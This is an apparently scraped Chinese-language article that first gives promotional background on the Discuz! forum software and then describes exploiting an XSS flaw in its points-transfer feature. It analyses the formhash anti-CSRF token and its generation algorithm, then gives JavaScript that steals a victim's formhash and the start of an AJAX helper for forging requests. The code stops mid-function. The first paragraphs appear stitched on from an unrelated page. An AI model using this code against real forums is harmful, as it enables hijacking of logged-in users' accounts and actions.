作为国内最大的社区软件及服务提供商,Comsenz旗下的 Discuz! 开发组具有丰富的 web 应用程序设计经验,尤其在论坛产品及相关领域,经过长期创新性开发,掌握了一整套从算法,数据结构到产品安全性方面的领先技术。使得 Discuz! 无论在稳定性,负载能力,安全保障等方面都居于国内外同类产品领先地位 搜狗电脑知识技巧
Discuz! 论坛软件系统项目起始于 2001 年底,初创时名称为 CDB,是一名大二学生戴志康借鉴国外同期技术,以技术研究为目的,利用业余时间完成的一个免费软件。因较快的升级与完善速度,CDB 于 2002 年初开始拥有了最早的一批用户。作者在技术学习和研究的同时,积极采纳来自最终用户的使用反馈,在用户的理解与支持下,CDB 作为一个相对起步较晚的论坛软件项目,取得了相对一个初创软件项目来说较快的进展,并实现了初期的网络协作开发模式。
本文重点在于discuz xss的利用, exploit是前几天疯子发的() 积分转账的xss漏洞,貌似利用有点鸡肋(=.=).
Discuz formhash 简单分析
熟悉discuz的都知道,formhash是一种类似验证码的东西,用来防止从我们网站外部提交数据,但不需要我们手动输入,它在页面打开时就已经生成了,存在一需要提交数据用到的地方的隐藏input里(比如登录、发布文章)。
例如发帖页面页面模板
<inputtype="hidden" name="formhash" id="formhash" value="{FORMHASH}" />
其相应服务端验证代码
if (submitcheck('formhash')) {
我们来看这货的生成算法
substr(md5(substr($_G['timestamp'], 0, -7).$_G['username'].$_G['uid'].$_G['authkey'].$hashadd.$specialadd), 8, 8);
时间戳前3位,大概是 100多天的样子,也就是说这货对于同一人来说 100 天内是不变的.
获取 formhash
当我们进行csrf操作时,首先得获取目标的 formhash,例如用户这里的提醒xss
/home.php?mod=space&do=notice&isread=1
截取出来即可
var hash;
function getHash(){
for(var i=0; i<document.links.length; i++)
{
if(document.links[i].href.indexOf("action=logout&formhash=")>0)
{
hash=document.links[i].href;
hash=hash.substr(hash.length-8,hash.length);
break;
} } }
Csrf代码编写
得到了formhash就简单了 只要抓取各种 post包即可做各种猥琐事情了 ,这里笔者用了个
兼容的ajax库(截取自jquery中的 ajax代码)
x = window.x || {
request: function() {
if (window.XMLHttpRequest) {
var ajax = new XMLHttpRequest()
} else if (window.ActiveXObject) {
try {
var ajax = new ActiveXObject("Msxml2.XMLHTTP")
} catch(e) {
try {
var ajax = new ActiveXObject("Microsoft.XMLHTTP")
} catch(e) {}
}
}
return ajax
},
handle: function(ajax, callback) {
ajax.onreadystatechange = function() {